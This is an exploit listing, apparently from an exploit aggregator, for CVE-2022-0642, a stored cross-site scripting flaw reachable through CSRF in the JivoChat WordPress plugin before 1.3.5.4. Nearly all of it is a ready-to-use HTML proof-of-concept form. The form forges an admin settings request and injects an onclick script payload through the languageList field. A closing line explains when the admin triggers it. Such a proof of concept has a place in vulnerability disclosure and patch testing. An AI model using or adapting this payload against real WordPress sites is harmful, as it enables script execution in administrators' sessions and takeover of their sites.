Exploit for JivoChat < 1.3.5.4 - Stored Cross-Site Scripting via CSRF CVE-2022-0642

Name: Exploit for JivoChat < 1.3.5.4 - Stored Cross-Site Scripting via CSRF CVE-2022-0642
Rating: 5 (98 reviews)

2022-05-09 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:099CF9B4-0B3A-43C6-8CA9-7C2D50F86425
<html>
	<body>
		<form method="POST" action="https://127.0.0.1/wordpress/wp-admin/admin.php?page=jivosite.php">
			<input type="hidden" name="email" value="attacker@example.com"/>
			<input type="hidden" name="userPassword" value="Test123"/>
			<input type="hidden" name="userDisplayName" value="test123"/>
			<input type="hidden" name="languageList" value='1337" onclick=alert(/XSS/) test="'/>
			<input type="submit" value="Submit">
		</form>
	</body>
<html>

XSS will be triggered when admin click "Go to Web Application"